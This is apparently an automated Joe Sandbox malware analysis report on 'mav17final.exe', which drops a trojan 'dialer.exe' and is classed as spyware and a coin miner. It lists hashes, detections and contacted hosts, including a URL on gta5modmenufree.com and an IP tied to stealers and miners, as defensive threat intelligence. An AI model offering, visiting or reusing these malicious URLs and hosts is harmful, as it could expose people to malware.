| mav17final.exe | 16% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\dialer.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\dialer.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\dialer.exe | 79% | ReversingLabs | Win64.Trojan.Zusy | |
| C:\ProgramData\dialer.exe | 65% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\dialer.exe | 79% | ReversingLabs | Win64.Trojan.Zusy | |
| C:\Users\user\AppData\Local\Temp\dialer.exe | 65% | Virustotal | | Browse |
      No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| gta5modmenufree.com | 5% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | 0% | URL Reputation | safe | |
| http://cacerts.digicert.co | 0% | URL Reputation | safe | |
| https://www.python.org/download/releases/2.3/mro/. | 0% | URL Reputation | safe | |
| https://www.openssl.org/H | 0% | URL Reputation | safe | |
| http://www.iana.org/time-zones/repository/tz-link.html | 0% | URL Reputation | safe | |
| http://www.cl.cam.ac.uk/~mgk25/iso-time.html | 0% | URL Reputation | safe | |
| https://peps.python.org/pep-0205/ | 0% | URL Reputation | safe | |
| http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm | 0% | URL Reputation | safe | |
| https://peps.python.org/pep-0263/ | 0% | URL Reputation | safe | |
| https://www.python.org/psf/license/ | 0% | URL Reputation | safe | |
| https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | 0% | Avira URL Cloud | safe | |
| https://github.com/giampaolo/psutil/issues/875. | 0% | Avira URL Cloud | safe | |
| https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | 0% | Avira URL Cloud | safe | |
| https://stackoverflow.com/questions/4457745#4457745 | 0% | Avira URL Cloud | safe | |
| http://mail.python.org/pipermail/python-dev/2012-June/120787.html | 0% | Avira URL Cloud | safe | |
| http://goo.gl/zeJZl | 0% | Avira URL Cloud | safe | |
| https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | 0% | Avira URL Cloud | safe | |
| https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | 0% | Virustotal | | Browse |
| https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | 0% | Avira URL Cloud | safe | |
| https://stackoverflow.com/questions/4457745#4457745 | 0% | Virustotal | | Browse |
| https://gta5modmenufree.com/CSHQRtZu/standingcpu | 0% | Avira URL Cloud | safe | |
| https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | 0% | Avira URL Cloud | safe | |
| https://github.com/giampaolo/psutil/issues/875. | 0% | Virustotal | | Browse |
| http://goo.gl/zeJZl | 0% | Virustotal | | Browse |
| https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | 0% | Virustotal | | Browse |
| http://mail.python.org/pipermail/python-dev/2012-June/120787.html | 0% | Virustotal | | Browse |
| https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | 0% | Virustotal | | Browse |
| https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | 0% | Virustotal | | Browse |
| https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | 0% | Virustotal | | Browse |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| gta5modmenufree.com | 188.114.96.3 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://gta5modmenufree.com/CSHQRtZu/standingcpu | false | Avira URL Cloud: safe | unknown |
URLs found in memory or binary data (Name, Source, Malicious, Antivirus Detection, Reputation):

https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
    Source: mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046833551.00000187176AB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2045701458.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046317483.00000187176AA000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052090144.00000187176AC000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2064361091.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052889217.00000187176B2000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2050639413.0000018717883000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
    Source: mav17final.exe, 00000002.00000002.2062169744.0000018717208000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
http://cacerts.digicert.co
    Source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://github.com/giampaolo/psutil/issues/875.
    Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://www.python.org/download/releases/2.3/mro/.
    Source: mav17final.exe, 00000002.00000002.2062169744.0000018717180000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992629255.000001871762E000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
http://mail.python.org/pipermail/python-dev/2012-June/120787.html
    Source: mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://stackoverflow.com/questions/4457745#4457745
    Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
    Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://www.openssl.org/H
    Source: mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
http://www.iana.org/time-zones/repository/tz-link.html
    Source: mav17final.exe, 00000002.00000003.1995336796.000001871785B000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
http://goo.gl/zeJZl
    Source: mav17final.exe, 00000002.00000003.1996191490.0000018717925000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html
    Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://peps.python.org/pep-0205/
    Source: mav17final.exe, 00000002.00000002.2066729753.0000018718CBC000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
    Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
    Source: mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
    Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718C38000.00000004.00001000.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
    Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: safe
    Reputation: unknown
https://peps.python.org/pep-0263/
    Source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
https://www.python.org/psf/license/
    Source: mav17final.exe, 00000002.00000002.2069042978.00007FF8A8D88000.00000004.00000001.01000000.00000004.sdmp
    Malicious: false
    Antivirus Detection: URL Reputation: safe
    Reputation: unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.96.3 | gta5modmenufree.com | European Union | | 13335 | CLOUDFLARENETUS | false
77.105.166.179 | unknown | Russian Federation | | 43176 | ICOMF-ASRU | false
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1445527
      Start date and time:2024-05-22 06:45:11 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 9m 57s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:70
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:mav17final.exe
      Detection:MAL
      Classification:mal100.spyw.evad.mine.winEXE@100/36@1/2
      EGA Information:
      • Successful, ratio: 66.7%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target dialer.exe, PID 3664 because it is empty
      • Execution Graph export aborted for target dialer.exe, PID 6204 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:45:58 | API Interceptor | 40x Sleep call for process: powershell.exe modified
00:46:01 | API Interceptor | 1x Sleep call for process: dialer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.114.96.3 | ARRIVAL NOTICE.doc | Get hash | malicious | Lokibot | Browse
• spencerstuartllc.top/evie2/five/fre.php
| Scan9430654.exe | Get hash | malicious | FormBook | Browse
• www.nifadofa.homes/38gc/
| Inventory_list.xls | Get hash | malicious | Unknown | Browse
• i8.ae/cGrnN
| ENQUIRY OFFER.xls | Get hash | malicious | FormBook | Browse
• dokdo.in/pYI
| Inventory_list.xls | Get hash | malicious | Unknown | Browse
• i8.ae/cGrnN
| file.exe | Get hash | malicious | FormBook | Browse
• www.huangpositive.site/bm6n/?8n=aAoejwWZFiCrfGqPBHj/m2/PxsdJwEc8tlnUGzKrzo1wpFIxo6POt5lRkeHtIuPuWQTQkS0T8WndeVqc1/AEe5wUm02jzsi98TQJhoA5iu/rECfyrNm2TAw=&xnjD=N4Pdr
| PHARMACEUTICAL ORDER.xls | Get hash | malicious | Unknown | Browse
• dokdo.in/zQz
| PON2401071.xls | Get hash | malicious | Unknown | Browse
• dokdo.in/wcg
| file.exe | Get hash | malicious | FormBook | Browse
• www.huangpositive.site/bm6n/
| PON2401071.xls | Get hash | malicious | Unknown | Browse
• dokdo.in/wcg
77.105.166.179 | Arceus.exe | Get hash | malicious | Xmrig | Browse
        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | Maersk-BL-Ref0929339041333 47367282378722.scr | Get hash | malicious | AgentTesla | Browse
• 104.26.13.205
| https://gw2lm63127.eleteriod.com/j2qv060236/#dG9tQGZpbHRlcnNwbHVzLmNvbQ== | Get hash | malicious | HTMLPhisher | Browse
• 104.17.2.184
| https://url6.mailanyone.net/scanner?m=1s9UFM-000CiC-67&d=4%7Cmail/90/1716316200/1s9UFM-000CiC-67%7Cin6e%7C57e1b682%7C26023477%7C10839452%7C664CE828D09A29E749862A491AAAC3E1&o=/phta:/ptspbinrllytaonozz.c.oeigc/a&s=IY823YGYdPj0VexD71Fh81X9-uM | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse
• 104.17.2.184
| NEW PURCHASE ORDER.exe | Get hash | malicious | FormBook | Browse
• 172.67.190.203
| Tsl _ Tuesday May 2024..rtf | Get hash | malicious | HTMLPhisher | Browse
• 188.114.97.3
| Tsl _ Tuesday May 2024..rtf | Get hash | malicious | HTMLPhisher | Browse
• 104.17.2.184
| http://msserver365.folletos.eu | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse
• 104.17.2.184
| SOA APR 24.exe | Get hash | malicious | AgentTesla | Browse
• 172.67.74.152
| https://url.au.m.mimecastprotect.com/s/mjsWCGv0k9hBOJLgS7iTae?domain=login.websonnsenndshares-pages.online | Get hash | malicious | Unknown | Browse
• 104.17.2.184
| http://sallywilliamson.com/ | Get hash | malicious | Unknown | Browse
• 104.17.31.174
ICOMF-ASRU | RxGB5U5XHX.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 77.105.161.254
| wnUwGBR8uK.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 77.105.161.254
| mE6cY5Lf5f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 77.105.161.180
| Arceus.exe | Get hash | malicious | Xmrig | Browse
• 77.105.166.179
| 0sE5N2driQ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 77.105.161.254
| URKhkNRquh.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 77.105.161.254
| SecuriteInfo.com.Linux.Siggen.9999.4259.32315.elf | Get hash | malicious | Unknown | Browse
• 77.105.163.9
| OMYZQMamB0.elf | Get hash | malicious | Unknown | Browse
• 77.105.163.9
| fgtt2yjapn.elf | Get hash | malicious | Unknown | Browse
• 77.105.163.9
| WLFUgfqVkO.elf | Get hash | malicious | Unknown | Browse
• 77.105.163.9
        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd | file.exe | Get hash | malicious | Unknown | Browse
| access_version_x32-64_pack.exe | Get hash | malicious | Unknown | Browse
| https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php | Get hash | malicious | Unknown | Browse
| Wave32bit.exe | Get hash | malicious | Unknown | Browse
| Wave32bit.exe | Get hash | malicious | Unknown | Browse
| DeltaX.exe | Get hash | malicious | Xmrig | Browse
| Arceus.exe | Get hash | malicious | Xmrig | Browse
| DeltaX.exe | Get hash | malicious | Xmrig | Browse
| W1dMSoIHTz.exe | Get hash | malicious | Unknown | Browse
| W1dMSoIHTz.exe | Get hash | malicious | Unknown | Browse
C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll | file.exe | Get hash | malicious | Unknown | Browse
| SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exe | Get hash | malicious | Python Stealer, Discord Token Stealer | Browse
| access_version_x32-64_pack.exe | Get hash | malicious | Unknown | Browse
| https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php | Get hash | malicious | Unknown | Browse
| Wave32bit.exe | Get hash | malicious | Unknown | Browse
| Wave32bit.exe | Get hash | malicious | Unknown | Browse
| DeltaX.exe | Get hash | malicious | Xmrig | Browse
| Arceus.exe | Get hash | malicious | Xmrig | Browse
| DeltaX.exe | Get hash | malicious | Xmrig | Browse
| SecuriteInfo.com.FileRepMalware.5539.23420.exe | Get hash | malicious | Unknown | Browse
                                                Process:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5290264
                                                Entropy (8bit):6.532307554125056
                                                Encrypted:false
                                                SSDEEP:98304:CoTBOZ1ed7R/gyE5hIblWsTvMq/tjafGriRNUP8lw:CoTBOvayyE3IblWKPljafGDaw
                                                MD5:0BCBEA7313655A42ECC0A1FDBCF37993
                                                SHA1:4262E7F1A051C50C0145CE932EC261E6B93F387E
                                                SHA-256:B63F00D14E4EDC4A5B63E48D3836DA41D3567BBEACB84322B054DD5B2A25A600
                                                SHA-512:11D99F7E31E65A3A0E2C63AAA9F0476EF3835BBBB96181043A642AC11503E7DA3DED331E5FD0F5D4A66951F674C14B6693434DE337B35ED77AFE0E21D49B3B7E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 79%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Gf.........."...........O.....@..........@..............................Q...........`.....................................................<.............P.......P..)....Q.h...............................(.......8............................................text...f........................... ..`.rdata..|B.......D..................@..@.data.....O.......O.................@....pdata........P.......P.............@..@.00cfg........P.......P.............@..@.tls..........P.......P.............@....reloc..h.....Q.......P.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):109392
                                                Entropy (8bit):6.641929675972235
                                                Encrypted:false
                                                SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exe, Detection: malicious, Browse
                                                • Filename: access_version_x32-64_pack.exe, Detection: malicious, Browse
                                                • Filename: , Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: Arceus.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.FileRepMalware.5539.23420.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):84760
                                                Entropy (8bit):6.570831353064175
                                                Encrypted:false
                                                SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                MD5:3859239CED9A45399B967EBCE5A6BA23
                                                SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: access_version_x32-64_pack.exe, Detection: malicious, Browse
                                                • Filename: , Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: Arceus.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: W1dMSoIHTz.exe, Detection: malicious, Browse
